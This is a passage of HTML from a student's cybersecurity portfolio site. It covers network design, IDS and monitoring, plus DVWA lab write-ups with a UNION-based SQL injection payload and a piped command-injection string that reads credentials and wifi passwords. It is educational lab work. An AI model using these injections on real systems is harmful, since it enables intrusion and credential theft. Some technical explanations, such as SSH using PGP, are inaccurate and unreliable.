          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
           <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
           <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#ddadb4b09dbfb8b8b6b0bcb3aef3b9b8ab"><span class="__cf_email__" data-cfemail="1a6a73775a787f7f71777b7469347e7f6c">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
           <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
           <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
           <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
           <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
          any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
           <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
